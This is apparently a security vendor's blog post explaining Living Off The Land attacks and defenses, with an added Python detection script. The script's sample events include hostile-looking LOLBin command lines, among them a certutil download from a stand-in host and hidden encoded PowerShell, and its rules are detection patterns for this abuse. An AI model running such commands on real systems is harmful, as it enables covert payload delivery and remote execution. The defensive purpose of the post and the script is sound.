Living Off The Land Attacks (LOTL): Explanation and Defense 

Publication date: Apr 12, 2024

Last Published: Apr 12, 2024


Staying ahead of emerging cybersecurity threats has become an essential responsibility for organizations of all sizes. One such threat that has recently gained significant traction is the so-called Living Off The Land (LOTL) attack.  

According to CrowdStrike’s 2023 threat report, a staggering 62% of detections in 2023 can be classified as LOTL attacks. Owners, IT managers, and decision-makers can’t afford to ignore this statistic. Instead, they must familiarize themselves with this advanced attack technique to protect their valuable data and maintain business continuity.  

What Are LOTL Attacks? 

Quick definition: A LOTL attack is a cyberattack technique that leverages existing tools, services, and processes within a target’s environment to carry out malicious activities. 

Just as the Greeks used a seemingly innocuous wooden horse to stealthily infiltrate and overcome the city of Troy, traditional malware often masquerades as legitimate files to breach digital defenses and cause damage.  

Such digital Trojan horses, or trojans for short, have caused a lot of damage in the past. For example, the ILOVEYOU trojan caused $8.7 billion in global losses after it was released in 2000. However, as modern organizations have become more cybersecurity-aware, they are less likely to allow unverified files into their networks without thorough scrutiny. As a result, most trojans are detected and neutralized before they can inflict significant damage. 

To overcome this challenge, attackers have shifted their focus to LOTL attacks, which take advantage of the trust placed in existing tools and processes.  

By abusing native system utilities, approved applications, and other trusted components already present on the host, such as PowerShell, Certutil, Windows Management Instrumentation (WMI), Remote Desktop Protocol (RDP), and others, attackers can carry out their malicious objectives without raising suspicion.  

These legitimate binaries are typically referred to as Living Off The Land Binaries (LOLBins) or, when the abused component is a script, Living Off The Land Scripts (LOLScripts). Their legitimate status and essential roles in daily operations mean they are often overlooked by security systems, or are at least very difficult to analyze properly using traditional security tools.  

For example, PowerShell, a command-line shell for the Windows operating system, was abused, among others, by the LockBit cybercriminal group, which used it to carry out ransomware attacks that encrypt the victim’s data and demand payment of a ransom. 


How Do LOTL Attacks Work? 

As we’ve just explained, LOTL attacks take advantage of existing LOLBins and LOLScripts, but how exactly? Let’s take a quick look: 

  1. A LOTL attack often starts with a simple user interaction, such as visiting a compromised or malicious website, opening a phishing email, or inserting an infected USB drive into a computer. The initial interaction allows the attacker to exploit an operating system or application vulnerability and inject fileless malware into legitimate software, where it can blend in with normal system activity. 
  2. With the fileless malware in place, the attacker can execute their malicious objectives, such as providing remote access, stealing data, or disrupting operations. Since the malicious activity is hidden in plain sight, using trusted programs and tools, it can be challenging for security systems to identify and respond to the threat. 
  3. To maintain continued access to the compromised system, attackers often employ techniques such as modifying the Windows registry, creating new user accounts with administrative privileges, or embedding malicious code into the system’s kernel. This allows them to continually reap the benefits of unauthorized access via trusted programs. 

The three steps can happen in basically no time unless the targeted organization has implemented robust security measures to detect and defend against LOTL attacks.  

Best Practices Against LOTL Attacks 

While defending against LOTL attacks can be difficult due to their reliance on legitimate system tools and processes, there are many highly effective best practices that any organization can implement to improve its defense posture against these advanced threats: 

  • Implement comprehensive and verbose logging: Maintain detailed logs of all system events, including network traffic, user activities, and process execution. Centralize these logs in a secure location so that you can analyze them properly.  
  • Perform behavior analysis: Advanced analytics tools, often incorporated into Security Information and Event Management (SIEM) solutions, can be used to analyze logs and detect unusual patterns of behavior that deviate from established norms. 
  • Reduce alert noise: Refine monitoring tools and alerting mechanisms to differentiate between typical administrative actions and potential threat behavior. When done correctly, you should receive a smaller number of more meaningful alerts, which in turn lowers the risk of alert fatigue.  
  • Perform system and software audits: Develop an inventory of existing configurations, policies, and installed software on each host. Uninstall unnecessary software to limit the LOLBins and LOLScripts available to attackers.  
  • Segment your network: Limit lateral movement possibilities for threat actors by segmenting your network into smaller, isolated zones. In a cloud environment, apply the same principles by architecting cloud enclaves using subnet or security group tools. 
  • Implement just-in-time access: A Privileged Access Management (PAM) solution can be used to grant temporary access to privileged accounts only when necessary and revoke access once the task is completed, minimizing the risk of compromised credentials being used for LOTL attacks. 
  • Invest in employee education: Educate your employees about the dangers of LOTL attacks and how something as seemingly innocuous as clicking on links or opening attachments from unknown sources can have severe consequences. 
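To make the logging, behavior analysis, and alert-noise points concrete, here is an added example (not from the original post or any vendor product) of how a small triage rule set can be run over centralized process-creation events. The events, rule names, and the admin baseline are constructed for illustration; the rules look for the LOLBin patterns the article names (PowerShell, Certutil, WMI) and an Office application spawning a script host, and they suppress only low-signal findings for baselined administrative activity.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 / Security 4688 style).
# Illustrative only, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand QQBCAEMA"},
    {"host": "ws02", "user": "CORP\\bob", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/x.txt x.txt"},
    {"host": "srv01", "user": "CORP\\svc-deploy", "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": "wmic /node:ws03 process call create notepad.exe"},
    {"host": "srv02", "user": "CORP\\it-admin", "parent": "ServerManager.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\ops\\patch.ps1"},
    {"host": "ws04", "user": "CORP\\carol", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]

# High-signal rules: (name, image substring, regex over the command line). Never suppressed.
HIGH_SIGNAL = [
    ("powershell_encoded_or_hidden", "powershell", re.compile(r"-(enc\w*|e|w\s+hidden)\b", re.I)),
    ("certutil_url_or_decode", "certutil", re.compile(r"-(urlcache|decode)\b", re.I)),
    ("wmic_remote_process_create", "wmic", re.compile(r"/node:.*process\s+call\s+create", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Constructed noise-reduction baseline: (user, parent image) pairs whose routine
# script-host use is expected, so plain executions from them do not page anyone.
ADMIN_BASELINE = {("CORP\\it-admin", "servermanager.exe")}

def evaluate(event, baseline=ADMIN_BASELINE):
    """Return (severity, [finding names]) for one process-creation event."""
    image, parent = event["image"].lower(), event["parent"].lower()
    findings = [n for n, sub, rx in HIGH_SIGNAL if sub in image and rx.search(event["cmdline"])]
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append("office_spawned_script_host")
    if findings:
        return "high", findings
    # Low-signal tier: any script-host launch that is not part of the admin baseline.
    if image in SCRIPT_HOSTS and (event["user"], parent) not in baseline:
        return "low", ["unbaselined_script_host"]
    return "none", []

def triage(events):
    """Evaluate every event and keep only those that produced an alert."""
    results = [(e["host"], *evaluate(e)) for e in events]
    return [r for r in results if r[1] != "none"]

if __name__ == "__main__":
    for host, severity, names in triage(SAMPLE_EVENTS):
        print(f"{host}: {severity} {names}")
```

In a real SIEM the baseline would come from the software and configuration inventory described above, and the "low" tier would feed a dashboard rather than an on-call pager.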

For more information about best practices against LOTL attacks, we recommend the joint guidance Identifying and Mitigating Living Off the Land Techniques (PDF), which CISA recently co-authored with several agencies from the USA, Australia, Canada, the United Kingdom, and New Zealand.  

Conclusion  

Living off the land (LOTL) attacks represent a significant risk because they can cleverly disguise themselves within your existing systems. But there’s no reason to let them compromise your organization. OSIbeyond’s expert team provides robust cybersecurity solutions, including advanced monitoring, threat detection, and proactive defense strategies, to keep you ahead of LOTL attacks and other emerging threats. Contact us today for more information.  
